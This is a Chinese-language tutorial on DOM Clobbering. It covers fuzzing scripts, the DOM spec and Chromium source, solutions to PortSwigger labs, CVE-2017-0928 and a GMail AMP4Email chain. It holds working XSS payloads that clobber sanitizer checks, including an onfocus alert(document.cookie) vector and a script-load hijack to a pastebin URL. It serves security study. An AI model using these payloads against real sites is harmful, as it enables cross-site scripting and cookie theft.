内容简介:前几天 PortSwigger 发布了From The Document Object Model (DOM) is a programming interface for HTML and XML documents. It represents the page so that programs can change the document structure, style, and content. The DOM represents the document as nodes and obje
前几天 PortSwigger 发布了 Top 10 web hacking techniques of 2019 ,榜上的攻击技术都比较有意思,p牛也肯定会在小密圈做分享的(如果没有话本菜也会在自己博客做做学习分享),所以我们这里就不聊 Top 10 技术了,就看看在 Top 10 提名结果没上榜但是依旧很有意思的技术 Dom Clobbering。
From MDN Web Docs :
The Document Object Model (DOM) is a programming interface for HTML and XML documents. It represents the page so that programs can change the document structure, style, and content. The DOM represents the document as nodes and objects. That way, programming languages can connect to the page.
A Web page is a document. This document can be either displayed in the browser window or as the HTML source. But it is the same document in both cases. The Document Object Model (DOM) represents that same document so it can be manipulated. The DOM is an object-oriented representation of the web page, which can be modified with a scripting language such as JavaScript.
The W3C DOM and WHATWG DOM standards are implemented in most modern browsers. Many browsers extend the standard, so care must be exercised when using them on the web where documents may be accessed by various browsers with different DOMs.
DOM 最初是在没有任何标准化的情况下诞生和实现的,这导致了许多特殊的行为,但是为了保持兼容性,很多浏览器仍然支持异常的 DOM 。
DOM 的旧版本(即DOM Level 0 & 1)仅提供了有限的通过 JavaScript 引用元素的方式,一些经常使用的元素具有专用的集合(例如 document.forms
),而其他元素可以通过 Window
和 Document
对象上的 name
属性和 id
由于非标准化的 DOM 行为,浏览器有时可能会向各种 DOM 元素添加 name & id 属性,作为对文档或全局对象的属性引用,但是,这会导致覆盖掉 document原有的属性或全局变量,或者劫持一些变量的内容,而且不同的浏览器还有不同的解析方式,所以本文的内容如果没有特别标注,均默认在 Chrome 80.0.3987.116 版本上进行。
Dom Clobbering 就是一种将 HTML 代码注入页面中以操纵 DOM 并最终更改页面上 JavaScript 行为的技术。 在无法直接 XSS 的情况下,我们就可以往 DOM Clobbering 这方向考虑了。
Simple Example
其实 Dom Clobbering 比较简单,我们看几个简单的例子就能知道它是干什么了的。
Exmaple 1 - Create
从图中我们可以看到通过 id 或者 name 属性,我们可以在 document
或者 window
Example 2 - Overwrite
可以看到 document.cookie
已经被我们用 img 标签给覆盖了
Example 3 - Overwrite2
可以看到我们通过多层覆盖掉了 document.body.appendChild
Attack Method
既然我们可以通过这种方式去创建或者覆盖 document 或者 window 对象的某些值,但是看起来我们举的例子只是利用标签创建或者覆盖最终得到的也是标签,是一个 HTMLElment
所以我们可以通过以下代码来进行 fuzz 得到可以通过 toString
Object.getOwnPropertyNames(window) .filter(p => p.match(/Element$/)) .map(p => window[p]) .filter(p => p && p.prototype && p.prototype.toString !== Object.prototype.toString)
我们可以得到两种标签对象: HTMLAreaElement (<area>)
& HTMLAnchorElement (<a>)
,这两个标签对象我们都可以利用 href
但是如果我们需要的是 x.y
<div id=x> <a id=y href='1:hasaki'></a> </div> <script> alert(x.y); </script>
这里无论第一个标签怎么组合,得到的结果都只是 undefined
。但是我们可以通过另一种方法加入引入 name 属性就会有其他的效果。
是一个 element
的“集合”类,在最新的 Dom 标准
中 IDL 描述如下:
[Exposed=Window, LegacyUnenumerableNamedProperties] interface HTMLCollection { readonly attribute unsigned long length; getter Element? item(unsigned long index); getter Element? namedItem(DOMString name); };
is a historical artifact we cannot rid the web of. While developers are of course welcome to keep using it, new API standard designers ought not to use it (use
in IDL instead).
它是一种历史产物,并且在今天我们也可以继续使用这个类,只是对于 API 标准设计者不推荐再使用。
collection . length
Returns the number of elements in the collection .
element = collection . item(index)
element = collection[index]
Returns the element with index index from the collection . The elements are sorted in tree order .
element = collection . namedItem(name)
element = collection[name]
Returns the first element with ID or name name from the collection.
让我们值得注意的是我们可以通过 collection[name]
的形式来调用其中的元素,所以我们似乎可以通过先构建一个 HTMLCollection
,再通过 collection[name]
<div id="x"> <a id="x" name=y href="1:hasaki"></a> </div>
HTML Relationships
再者,我们也可以通过利用 HTML 标签之间存在的关系来构建层级关系。
var log=[]; var html = ["a","abbr","acronym","address","applet","area","article","aside","audio","b","base","basefont","bdi","bdo","bgsound","big","blink","blockquote","body","br","button","canvas","caption","center","cite","code","col","colgroup","command","content","data","datalist","dd","del","details","dfn","dialog","dir","div","dl","dt","element","em","embed","fieldset","figcaption","figure","font","footer","form","frame","frameset","h1","head","header","hgroup","hr","html","i","iframe","image","img","input","ins","isindex","kbd","keygen","label","legend","li","link","listing","main","map","mark","marquee","menu","menuitem","meta","meter","multicol","nav","nextid","nobr","noembed","noframes","noscript","object","ol","optgroup","option","output","p","param","picture","plaintext","pre","progress","q","rb","rp","rt","rtc","ruby","s","samp","script","section","select","shadow","slot","small","source","spacer","span","strike","strong","style","sub","summary","sup","svg","table","tbody","td","template","textarea","tfoot","th","thead","time","title","tr","track","tt","u","ul","var","video","wbr","xmp"], logs = []; div=document.createElement('div'); for(var i=0;i<html.length;i++) { for(var j=0;j<html.length;j++) { div.innerHTML='<'+html[i]+' id=element1>'+'<'+html[j]+' id=element2>'; document.body.appendChild(div); if(window.element1 && element1.element2){ log.push(html[i]+','+html[j]); } document.body.removeChild(div); } } console.log(log.join('\n'));
以上代码测试了现在 HTML5 基本上所有的标签,使用两层的层级关系进行 fuzz ,注意这里只使用了 id
,并没有使用 name
,遇上文的 HTMLCollection
form->button form->fieldset form->image form->img form->input form->object form->output form->select form->textarea
如果我们想要构建 x.y
<form id=x><output id=y>I've been clobbered</output> <script> alert(x.y.value); </script>
Three Level
<form id="x" name="y"><output id=z>I've been clobbered</output></form> <form id="x"></form> <script> alert(x.y.z.value); </script>
这个也比较简单,先用一个 HTMLCollection
获取第二级,再在第一个表单中用 output
三层层级以上的我们就需要用到 iframe
与 srcdoc
<iframe name=a srcdoc=" <iframe srcdoc='<a id=c name=d href=cid:Clobbered>test</a><a id=c>' name=b>"></iframe> <script>setTimeout(()=>alert(a.b.c.d),500)</script>
因为需要等待所有的 iframe
<iframe name=a srcdoc=" <iframe srcdoc='<a id=c name=d href=cid:Clobbered>test</a><a id=c>' name=b>"></iframe> <style>@import 'http://example.com';</style> <script> alert(a.b.c.d) </script>
以上我们都是通过 id 或者 name 来利用,那我们能不能通过自定义属性来构造呢?
<form id=x y=123></form> <script> alert(x.y)//undefined </script>
很明显,这意味着任何未定义的属性都不会具有 DOM 属性,所以就返回了 undefined
我们可以尝试一下 fuzz 所有标签的有没有字符串类型的属性可供我们使用:
var html = [...]//HTML elements array var props=[]; for(i=0;i<html.length;i++){ obj = document.createElement(html[i]); for(prop in obj) { if(typeof obj[prop] === 'string') { try { props.push(html[i]+':'+prop); }catch(e){} } } } console.log([...new Set(props)].join('\n'));
a:username a:password
var html = [...]//HTML elements array var props=[]; for(i=0;i<html.length;i++){ obj = document.createElement(html[i]); for(prop in obj) { if(typeof obj[prop] === 'string') { try { DOM.innerHTML = '<'+html[i]+' id=x '+prop+'=1>'; if(document.getElementById('x')[prop] == 1) { props.push(html[i]+':'+prop); } }catch(e){} } } } console.log([...new Set(props)].join('\n'));
我们可以得到一系列的标签以及其属性名称,例如我们可以利用其中的 a:title
<a id=x title='hasaki'></a> <script> console.log(x.title);//hasaki </script>
其中在我们第一步得到的属性中比较有意思的是 a 标签的 username
跟 password
属性,虽然我们不能直接通过 title
这种形式利用,但是我们可以通过 href
<a id=x href="ftp:Clobbered-username:[email protected]">
Exploit Example
PostWigger 提供了两个实验环境 https://portswigger.net/web-security/dom-based/dom-clobbering,
Lab: Exploiting DOM clobbering to enable XSS
This lab contains a DOM-clobbering vulnerability. The comment functionality allows “safe” HTML. To solve this lab, construct an HTML injection that clobbers a variable and uses XSS to call the alert() function.
这个实验我们可以在 resources/js/loadCommentsWithDomPurify.js
路由找到这个 JS 文件,在 displayComments()
let defaultAvatar = window.defaultAvatar || {avatar: '/resources/images/avatarDefault.svg'} let avatarImgHTML = '<img src="' + (comment.avatar ? escapeHTML(comment.avatar) : defaultAvatar.avatar) + '">'; let divImgContainer = document.createElement("div"); divImgContainer.innerHTML = avatarImgHTML
这里很明显我们可以用 Dom Clobbering 来控制 window.defaultAvatar
,只要我们原来没有头像就可以用一个构造一个 defaultAvatar.avatar
进行 XSS 了。
根据前面的知识,这是一个两层的层级关系,我们可以用 HTMLCollection 来操作
<a id=defaultAvatar><a id=defaultAvatar name=avatar href="1:"onerror=alert(1)//">
这里注意 "
需要进行 HTML实体编码,用 URL 编码的话浏览器会报错 1:%22onerror=alert(1)// net::ERR_FILE_NOT_FOUND
<p><a id="defaultAvatar"></a><a href="1:"onerror=alert(1)//" name="avatar" id="defaultAvatar"></a></p>
我们再随便评论一下就好了,就可以触发我们构造的 XSS 了。
Lab:Clobbering DOM attributes to bypass HTML filters
This lab uses the HTMLJanitor library, which is vulnerable to DOM clobbering . To solve this lab, construct a vector that bypasses the filter and uses DOM clobbering to inject a vector that alerts document.cookie. You may need to use the exploit server in order to make your vector auto-execute in the victim’s browser.
Note: The intended solution to this lab will not work in Firefox. We recommend using Chrome to complete this lab.
这个题目也比较有意思,在 resources/js/loadCommentsWithHtmlJanitor.js
文件中,我们可以发现代码安全多了,没有明显的直接用 Window.x
let janitor = new HTMLJanitor({tags: {input:{name:true,type:true,value:true},form:{id:true},i:{},b:{},p:{}}});
一开始就初始化了 HTMLJanitor
,只能使用初始化内的标签及其属性,对于重要的输入输出地方都使用了 janitor.clean
进行过滤。看起来我们没办法很简单地进行 XSS ,那我们就只能来看看 resources/js/htmlJanitor.js
HTMLJanitor.prototype.clean = function(html) { const sandbox = document.implementation.createHTMLDocument(""); const root = sandbox.createElement("div"); root.innerHTML = html; this._sanitize(sandbox, root); return root.innerHTML; };
首先用 document.implementation.createHTMLDocument
创建了一个新的 HTML 文档用作 sandbox ,然后对于 sandbox 内的元素进行 _sanitize
HTMLJanitor.prototype._sanitize = function(document, parentNode) { truetruevar treeWalker = createTreeWalker(document, parentNode); //... }
在 _sanitize
函数一开始调用了 createTreeWalker
函数创建一个 TreeWalker
function createTreeWalker(document, node) { return document.createTreeWalker( node, NodeFilter.SHOW_TEXT | NodeFilter.SHOW_ELEMENT | NodeFilter.SHOW_COMMENT, null, false ); }
这里的 node
即为一开始的 root
,也就是我们构造的 html
会在传入到 node
参数, document
即为一开始的 sandbox
if (node.nodeType === Node.TEXT_NODE) { true//如果此文本节点只是空白,并且上一个或下一个元素同级是`blockElement`,则将其删除 } // 移除所有的注释 if (node.nodeType === Node.COMMENT_NODE) { //... } //检查`inlineElement`中是否还有`BlockElement` var isInline = isInlineElement(node); var containsBlockElement; if (isInline) { containsBlockElement = Array.prototype.some.call( node.childNodes, isBlockElement ); } //检查`BlockElement`是否嵌套 var isNotTopContainer = !!parentNode.parentNode; var isNestedBlockElement = isBlockElement(parentNode) && isBlockElement(node) && isNotTopContainer; var nodeName = node.nodeName.toLowerCase(); //获取允许使用的属性 var allowedAttrs = getAllowedAttrs(this.config, nodeName, node); var isInvalid = isInline && containsBlockElement; //根据白名单删除标签 if ( isInvalid || shouldRejectNode(node, allowedAttrs) || (!this.config.keepNestedBlockElements && isNestedBlockElement) ) { // Do not keep the inner text of SCRIPT/STYLE elements. if ( !(node.nodeName === "SCRIPT" || node.nodeName === "STYLE") ) { while (node.childNodes.length > 0) { parentNode.insertBefore(node.childNodes[0], node); } } parentNode.removeChild(node); this._sanitize(document, parentNode); break; }
// Sanitize attributes for (var a = 0; a < node.attributes.length; a += 1) { var attr = node.attributes[a]; if (shouldRejectAttr(attr, allowedAttrs, node)) { node.removeAttribute(attr.name); // Shift the array to continue looping. a = a - 1; } } // Sanitize children this._sanitize(document, node);
在这里最终对标签的属性进行了 check ,对 node 的每个属性都进行了白名单检查
function shouldRejectAttr(attr, allowedAttrs, node) { var attrName = attr.name.toLowerCase(); if (allowedAttrs === true) { return false; } else if (typeof allowedAttrs[attrName] === "function") { return !allowedAttrs[attrName](attr.value, node); } else if (typeof allowedAttrs[attrName] === "undefined") { return true; } else if (allowedAttrs[attrName] === false) { return true; } else if (typeof allowedAttrs[attrName] === "string") { return allowedAttrs[attrName] !== attr.value; } return false; }
如果发现有不在白名单的属性,会使用 node.removeAttribute(attr.name);
进行删除,然后对子节点进行递归 _sanitize
标签的获取由 treeWalker.firstChild();
得到,过滤由 getAllowedAttrs
以及 shouldRejectNode
两个函数进行,由于这里的过滤是进行白名单过滤,没什么办法进行绕过;属性的获取在一个 for
循环当中,条件是 node.attributes.length
,获取方式是 node.attributes[a]
,过滤由 shouldRejectAttr
对 Dom Clobbering 比较敏感的同学可能会注意到这里,对于 node 属性过滤时的 for
循环条件,直接使用了 node.attributes.length
,倘若我们构造的节点正好有一个 attributes
<form id=x> <img> </form> <script> var node = document.getElementById('x'); console.log(node.attributes); for (let a = 0; a < node.attributes.length; a++) { console.log(node.attributes[a]); } console.log('finished'); </script>
以上这段代码会输出一个 NamedNodeMap
对象, id='x'
以及 finished
<form id=x> <img name=attributes> </form> <script> var node = document.getElementById('x'); console.log(node.attributes); for (let a = 0; a < node.attributes.length; a++) { console.log(node.attributes[a]); } console.log('finished'); </script>
以上这段代码会输出 <img name=attributes>
以及 finished ,我们可以看到我们使用 name=attributes
成功地覆盖了原来的 node.attributes
,所以 node.attributes.length
在这里的值为 undefined
,并且也没有影响 JS 代码的继续运行。
所以明白了这个简单的例子,我们可以构造一个包含有 name=attributes
的子节点的 payload 绕过属性的 check ,这里给定的白名单标签也比较明显,我们可以通过 HTML Relationships 来构造我们的 payload
<form id=x ><input id=attributes>
接着就是构造 XSS 了,根据题目要求,需要用户访问触发,所以我们可以利用 tabindex
属性,配合 form
的 onfocus
时间来 XSS 。
<form id=x tabindex=0 onfocus=alert(document.cookie)><input id=attributes>
但是如果直接交给用户点击的话是不会触发的,因为评论是由 aJax 请求拿到的,直接访问的话,Dom 树是还没有评论的,得需要等待 JS 执行完成才会有评论,所以这里我们需要一个延时或者阻塞的操作。比较简单的是利用 iframe
进行 setTimeout
<iframe src=https://your-lab-id.web-security-academy.net/post?postId=3 onload="setTimeout(a=>this.src=this.src+'#x',500)">
这里要注意一定要得等评论加载完毕再用 #x
选择 form
,所以这里的 500ms 需要根据自己的网络情况适当调整。
CVE-2017-0928 Bypassing sanitization using DOM clobbering
html-janitor 也就是我们上文用到的 HTML filters,在 v2.0.2 当中,janitor 在循环中有这么几行代码:
do { // Ignore nodes that have already been sanitized if (node._sanitized) { continue; } //... // Sanitize children this._sanitize(node); // Mark node as sanitized so it's ignored in future runs node._sanitized = true; } while ((node = treeWalker.nextSibling()));
用 _sanitized
作为标志位来标志是否已经进行标准化,但是这里,由我们上个例子可以得出,我们可以利用与上个例子类似的 payload 绕过第一个 if 就可以绕过标准化过滤了。
<form><object onmouseover=alert(document.domain) name=_sanitized></object></form>
XSS in GMail’s AMP4Email via DOM Clobbering
终于到了我们开头提到的 OWASP Top 10 提名的攻击实例了,作者首先通过直接在控制台输入 window 进行 fuzz
这里他首先利用了 AMP
,尝试插入 <a id=AMP>
,但是这个 AMP
被 ban 了
接着找到下一个 AMP_MODE
,这个没有被 ban ,反而让作者发现了这里加载失败的 URL 当中有一个 undefined
这就是作者插入了 <a id=AMP_MODE>
导致产生的 undefined
var script = window.document.createElement("script"); script.async = false; var loc; if (AMP_MODE.test && window.testLocation) { loc = window.testLocation } else { loc = window.location; } if (AMP_MODE.localDev) { loc = loc.protocol + "//" + loc.host + "/dist" } else { loc = "https://cdn.ampproject.org"; } var singlePass = AMP_MODE.singlePassType ? AMP_MODE.singlePassType + "/" : ""; b.src = loc + "/rtv/" + AMP_MODE.rtvVersion; + "/" + singlePass + "v0/" + pluginName + ".js"; document.head.appendChild(b);
var script = window.document.createElement("script"); script.async = false; b.src = window.testLocation.protocol + "//" + window.testLocation.host + "/dist/rtv/" + AMP_MODE.rtvVersion; + "/" + (AMP_MODE.singlePassType ? AMP_MODE.singlePassType + "/" : "") + "v0/" + pluginName + ".js"; document.head.appendChild(b);
所以我们可以用 Dom Clobbering 来让它加载我们任意的 js 文件,直接劫持 protocol
到我们任意 URL,再利用 #
<!-- We need to make AMP_MODE.localDev and AMP_MODE.test truthy--> <a id="AMP_MODE"></a> <a id="AMP_MODE" name="localDev"></a> <a id="AMP_MODE" name="test"></a> <!-- window.testLocation.protocol is a base for the URL --> <a id="testLocation"></a> <a id="testLocation" name="protocol" href="https://pastebin.com/raw/0tn8z0rG#"></a>
虽然 URL 构造出来了,但是 Google 还有 CSP
Content-Security-Policy: default-src 'none'; script-src 'sha512-oQwIl...==' https://cdn.ampproject.org/rtv/ https://cdn.ampproject.org/v0.js https://cdn.ampproject.org/v0/
虽然他当时没绕过,但是 Google 还是全额地给了他奖金。
另外这个 CSP 可以利用 ..%252f
的 trick 进行绕过,由于不属于这篇文章的范围,这里就不详述了,感兴趣的同学可自行搜索。
这里由于篇幅关系,就不再列举更多的例子了,我会把最近自己做的一些 XSS Game 中涉及到 Dom Clobbering 的部分以 Tip 的形式写出来。
既然我们一开始提到过或许可以覆盖某些属性,那么我们可不可以覆盖或者说完全控制 document.cookie
呢?究竟我们可以覆盖哪些呢?又可以怎么利用呢?哪些可以用 ID 哪些用 Name呢?
接下来我们来看最后一个问题:哪些用 id 哪些用 name ?
Document & Id
var html = [...];//HTML elements array var log = []; var div = document.createElement("div"); for (var i = 0; i < html.length; i++) { div.innerHTML = "<" + html[i] + " id=x >"; document.body.appendChild(div); if (document.x == document.getElementById('x') && document.x != undefined) { log.push(html[i]); } document.body.removeChild(div); } console.log(log);
我们可以得到只有 object
标签 document
可以通过 id 进行直接获取
Document & Name
document.x == document.getElementsByName("x")[0] && document.x != undefined
我们可以得到以下五个元素可以让 document
通过 name 进行直接获取
["embed", "form", "image", "img", "object"]
Document & Name & Id
var html = [...];//HTML elements array var log = []; var div = document.createElement("div"); for (var i = 0; i < html.length; i++) { div.innerHTML = "<" + html[i] + " id=x name=y >"; document.body.appendChild(div); if ( document.x == document.getElementsByName("y")[0] && document.x != undefined ) { log.push(html[i]); } document.body.removeChild(div); } console.log(log);
["image", "img", "object"]
Window & Id
var html = [...];//HTML elements array var log = []; var div = document.createElement("div"); for (var i = 0; i < html.length; i++) { div.innerHTML = "<" + html[i] + " id=x >"; document.body.appendChild(div); if (window.x == document.getElementById('x') && window.x != undefined) { log.push(html[i]); } document.body.removeChild(div); } console.log(log);
除了在部分的标签,其他标签 window
均可通过 id 进行直接获取
(128) ["a", "abbr", "acronym", "address", "applet", "area", "article", "aside", "audio", "b", "base", "basefont", "bdi", "bdo", "bgsound", "big", "blink", "blockquote", "br", "button", "canvas", "center", "cite", "code", "command", "content", "data", "datalist", "dd", "del", "details", "dfn", "dialog", "dir", "div", "dl", "dt", "element", "em", "embed", "fieldset", "figcaption", "figure", "font", "footer", "form", "h1", "header", "hgroup", "hr", "i", "iframe", "iframes", "image", "img", "input", "ins", "isindex", "kbd", "keygen", "label", "legend", "li", "link", "listing", "main", "map", "mark", "marquee", "menu", "menuitem", "meta", "meter", "multicol", "nav", "nextid", "nobr", "noembed", "noframes", "noscript", "object", "ol", "optgroup", "option", "output", "p", "param", "picture", "plaintext", "pre", "progress", "q", "rb", "rp", "rt", "rtc", "ruby", "s", "samp", "script", …]
Window & Name
window.x == document.getElementsByName("x")[0] && window.x != undefined
这里与 document 一致,只有五个标签可以让 window
通过 name 进行直接获取
["embed", "form", "image", "img", "object"]
‘Not Clobbered’
["body", "caption", "col", "colgroup", "frame", "frameset", "head", "html", "tbody", "td", "tfoot", "th", "thead", "tr"]
PS: 这部分并不是真正不能 Clobbered ,因为比如说 body
,因为我本身界面存在一个 body
标签,只是在我测试构建的简单的 HTML 页面中,这些标签不能被 Clobbered ,而且在实际中也用到比较少。并且根据 Chromium 中的说法是”but anything by id”,所以如果需要通过 Window.id
Dom Doc
其实在 Dom 标准中也有提及过这部分,在 A part of Document interface 这一段中,我们可以看到有相关规定:
The Document
interface supports named properties
. The supported property names
of a Document
object document at any moment consist of the following, in tree order
according to the element that contributed them, ignoring later duplicates, and with values from id
attributes coming before values from name
attributes when the same element contributes both:
the value of the
content attribute for all exposedembed
, and exposedobject
elements that have a non-emptyname
content attribute and are in a document tree with document as their root ; -
the value of the
content attribute for all exposedobject
elements that have a non-emptyid
content attribute and are in a document tree with document as their root ; and -
the value of the
content attribute for allimg
elements that have both a non-emptyid
content attribute and a non-emptyname
content attribute, and are in a document tree with document as their root .
也有关于 Window 对象的部分 :
The Window
object supports named properties
. The supported property names
of a Window
object window at any moment consist of the following, in tree order
according to the element that contributed them, ignoring later duplicates:
- window’s document-tree child browsing context name property set ;
the value of the
content attribute for allembed
, andobject
elements that have a non-emptyname
content attribute and are in a document tree with window’s associatedDocument
as their root ; and -
the value of the
content attribute for all HTML elements that have a non-emptyid
content attribute and are in a document tree with window’s associatedDocument
as their root .
关于 window 对象,虽然 window 对象可以通过 id 直接获取标签,但是我目前还没发现可以直接通过标签 id 进行 clobber 的属性,毕竟是基于 Dom 的攻击技术。
至于 Document 对象,我列举了一下 Document 对象特有的属性以及其对应的类型:
Class | Attr |
DOMImplementation | [“implementation”] |
HTMLCollection | [“images”, “embeds”, “plugins”, “links”, “forms”, “scripts”, “anchors”, “applets”, “children”] |
String | [“documentURI”, “compatMode”, “characterSet”, “charset”, “inputEncoding”, “contentType”, “domain”, “referrer”, “cookie”, “lastModified”, “readyState”, “title”, “dir”, “designMode”, “fgColor”, “linkColor”, “vlinkColor”, “alinkColor”, “bgColor”, “visibilityState”, “webkitVisibilityState”, “nodeName”, “baseURI”] |
HTMLBodyElement | [“body”, “activeElement”] |
HTMLHeadElement | [“head”] |
HTMLScriptElement | [“currentScript”] |
HTMLAllCollection | [“all”] |
NodeList | [“childNodes”] |
Window | [“defaultView”] |
DocumentType | [“doctype”, “firstChild”] |
Boolean | [“xmlStandalone”, “hidden”, “wasDiscarded”, “webkitHidden”, “fullscreenEnabled”, “fullscreen”, “webkitIsFullScreen”, “webkitFullscreenEnabled”, “pictureInPictureEnabled”, “isConnected”] |
FontFaceSet | [“fonts”] |
StyleSheetList | [“styleSheets”] |
Function | [“getElementsByTagName”, “getElementsByTagNameNS”, “getElementsByClassName”, “createDocumentFragment”, “createTextNode”, “createCDATASection”, “createComment”, “createProcessingInstruction”, “importNode”, “adoptNode”, “createAttribute”, “createAttributeNS”, “createEvent”, “createRange”, “createNodeIterator”, “createTreeWalker”, “getElementsByName”, “write”, “writeln”, “hasFocus”, “execCommand”, “queryCommandEnabled”, “queryCommandIndeterm”, “queryCommandState”, “queryCommandSupported”, “queryCommandValue”, “clear”, “exitPointerLock”, “createElement”, “createElementNS”, “caretRangeFromPoint”, “elementFromPoint”, “elementsFromPoint”, “getElementById”, “prepend”, “append”, “querySelector”, “querySelectorAll”, “exitFullscreen”, “webkitCancelFullScreen”, “webkitExitFullscreen”, “createExpression”, “createNSResolver”, “evaluate”, “registerElement”, “exitPictureInPicture”, “hasChildNodes”, “getRootNode”, “normalize”, “cloneNode”, “isEqualNode”, “isSameNode”, “compareDocumentPosition”, “contains”, “lookupPrefix”, “lookupNamespaceURI”, “isDefaultNamespace”, “insertBefore”, “appendChild”, “replaceChild”, “removeChild”] |
NodeList | [“childNodes”] |
Array | [“adoptedStyleSheets”] |
FeaturePolicy | [“featurePolicy”] |
Null | [“xmlEncoding”, “xmlVersion”, “onreadystatechange”, “onpointerlockchange”, “onpointerlockerror”, “onbeforecopy”, “onbeforecut”, “onbeforepaste”, “onfreeze”, “onresume”, “onsecuritypolicyviolation”, “onvisibilitychange”, “oncopy”, “oncut”, “onpaste”, “pointerLockElement”, “fullscreenElement”, “onfullscreenchange”, “onfullscreenerror”, “webkitCurrentFullScreenElement”, “webkitFullscreenElement”, “onwebkitfullscreenchange”, “onwebkitfullscreenerror”, “rootElement”, “pictureInPictureElement”, “ownerDocument”, “parentNode”, “parentElement”, “previousSibling”, “nextSibling”, “nodeValue”, “textContent”] |
其中, HTMLBodyElement
/ HTMLHeadElement
/ HTMLScriptElement
均继承自 HTMLElement
,为什么需要这些呢?因为在很多时候我们 Clobber 得到的就是一个 HTMLElement
,而 Document 某些属性得到的也是一个 HTMLElement
我想如果能覆盖的话,应该就是在调用 document.x
的时候, Dom 树解析得到的结果要优先于 document
自己本身属性,所以产生了这样的结果,但是这里也有一个问题,就是为什么我们在覆盖 cookie
带着这些疑问,我特地去看了一会 chromium 的源码,简略地看了一下这些实现,主要在 chromium 的 blink 部分。由于自己知识浅薄,并没有完整地阅读过 chromium 源码,这里还可能设计到一些编译原理的知识,所以我并没有安全把整个 Chromium 产生这个问题的缘由以代码追踪的形式弄出来,如果要弄的话估计也得去 debug Chromium ,那就是另一篇文章的内容了,所以这个部分还有待继续研究,不过我把自己看的一些有用的部分写出来。如果有兴趣的朋友可以联系我一起研究看看。(虽然我很菜XD
全部代码来源于 Chomiunm Code Search ,这个平台可以比较方便审代码。
首先我们来看看 location
,我们既可以使用 window.location
也可以使用 document.location
拿到 location
,这也能说明我们为什么上文要单独 fuzz Document 特有的属性而不是全部属性了。
在 Chromium 源码中,找到 location
比较简单, Chromium 直接调用了 window
对象的 location()
在 third_party/blink/renderer/core/dom/document.cc
中,第 933 行中有相关定义 Document::location()
Location* Document::location() const { if (!GetFrame()) return nullptr; return domWindow()->location(); }
可以看到,直接调用了 domWindow()
来获取 location
,在 third_party/blink/renderer/core/frame/dom_window.cc
中,第85行有相关定义 DOMWindow::location()
Location* DOMWindow::location() const { if (!location_) location_ = MakeGarbageCollected<Location>(const_cast<DOMWindow*>(this)); return location_.Get(); }
另外,有人提过相关用其他 hook 的方式 Issue 315760: document.domain can be hooked ,里面提到可以 hook 到 domain 跟 location ,但是我在目前 stable chrome 上测试只能 hook 到 domain ,至于 location 不知道是不是被修了,尽管回复的是”Browsers allow hooking these properties. It doesn’t matter”
这里简单看了一下 Cookie 的实现,主要是这两部分代码:
String Document::cookie(ExceptionState& exception_state) const { if (GetSettings() && !GetSettings()->GetCookieEnabled()) return String(); CountUse(WebFeature::kCookieGet); if (!GetSecurityOrigin()->CanAccessCookies()) { if (IsSandboxed(mojom::blink::WebSandboxFlags::kOrigin)) exception_state.ThrowSecurityError( "The document is sandboxed and lacks the 'allow-same-origin' flag."); else if (Url().ProtocolIs("data")) exception_state.ThrowSecurityError( "Cookies are disabled inside 'data:' URLs."); else exception_state.ThrowSecurityError("Access is denied for this document."); return String(); } else if (GetSecurityOrigin()->IsLocal()) { CountUse(WebFeature::kFileAccessedCookies); } if (!cookie_jar_) return String(); return cookie_jar_->Cookies(); }
String CookieJar::Cookies() { KURL cookie_url = document_->CookieURL(); if (cookie_url.IsEmpty()) return String(); RequestRestrictedCookieManagerIfNeeded(); String value; backend_->GetCookiesString(cookie_url, document_->SiteForCookies(), document_->TopFrameOrigin(), &value); return value; }
以及,虽然 cookie 不能被完全字符串化控制,但是可以被 Clobbered 的问题在2年前也有人报告过这个相关的问题 document.cookie DOM property can be clobbered using DOM node named cookie
只不过目前的主流浏览器都是”Safari, Chrome and Firefox all behave the same here”。
Document Collection
涉及到 Collection 的 Document 部分:
bool DocumentNameCollection::ElementMatches(const HTMLElement& element) const { // Match images, forms, embeds, objects and iframes by name, // object by id, and images by id but only if they have // a name attribute (this very strange rule matches IE) auto* html_embed_element = DynamicTo<HTMLEmbedElement>(&element); if (IsA<HTMLFormElement>(element) || IsA<HTMLIFrameElement>(element) || (html_embed_element && html_embed_element->IsExposed())) return element.GetNameAttribute() == name_; auto* html_image_element = DynamicTo<HTMLObjectElement>(&element); if (html_image_element && html_image_element->IsExposed()) return element.GetNameAttribute() == name_ || element.GetIdAttribute() == name_; if (IsA<HTMLImageElement>(element)) { const AtomicString& name_value = element.GetNameAttribute(); return name_value == name_ || (element.GetIdAttribute() == name_ && !name_value.IsEmpty()); } return false; }
Window Collection
涉及到 Collection 的 Window 部分:
bool WindowNameCollection::ElementMatches(const Element& element) const { // Match only images, forms, embeds and objects by name, // but anything by id if (IsA<HTMLImageElement>(element) || IsA<HTMLFormElement>(element) || IsA<HTMLEmbedElement>(element) || IsA<HTMLObjectElement>(element)) { if (element.GetNameAttribute() == name_) return true; } return element.GetIdAttribute() == name_; }
Tip 1 Global Scope
由于 Dom Clobbering 利用方式之一就是 hook 全局作用域下的变量,又由于 Javascript 是一门十分神奇的语言,所以我们需要注意如下几点
<script> var a = 1; let b = 2; var c = function () {}; console.log(window.a); //1 console.log(window.b); //undefined console.log(window.c); //ƒ () {} </script>
<script> function test(a){ b = a + 1; } test(1); console.log(window.b); //2 </script>
不带有 声明关键字 的变量,Javascript 会自动挂载到全局作用域上。
let & var
ES6 中新增了 let
命令,用来声明变量。它的用法类似于 var
,但是所声明的变量,只在 let
命令所在的代码块内有效。详细可以参考 let 基本用法
{ let a = 10; var b = 1; } a // ReferenceError: a is not defined. b // 1
上面代码在代码块之中,分别用 let
和 var
声明了两个变量。然后在代码块之外调用这两个变量,结果 let
声明的变量报错, var
声明的变量返回了正确的值。这表明, let
let a = b = 6; window.a; //undefined window.b; //6
Tip 2 Overwrite function
虽然可以 Clobber 函数,但是目前我没找到什么方法让他执行我们 Clobber 的结果,或者说目前貌似也没有办法通过标签来定义一个函数,所以只能是引起一个报错,
<img id='getElementById' name='getElementById'> <script> var a = document.getElementById('x'); //Uncaught TypeError: document.getElementById is not a function </script>
<img id='getElementById' name='getElementById'> <script> var a = document.getElementById('x'); //Uncaught TypeError: document.getElementById is not a function //We must use sanitize a here. </script> <script> //We have sanitized a. We can trust a now! //Do something with a. </script>
第一个 JS 代码块虽然引起了报错,但是不会引起 JS 完全停止执行,JS 会跳过这个报错的代码块,执行下一个代码块。
Tip 3 Prototype Pollution
以上就是本文的全部内容,希望对大家的学习有所帮助,也希望大家多多支持 码农网
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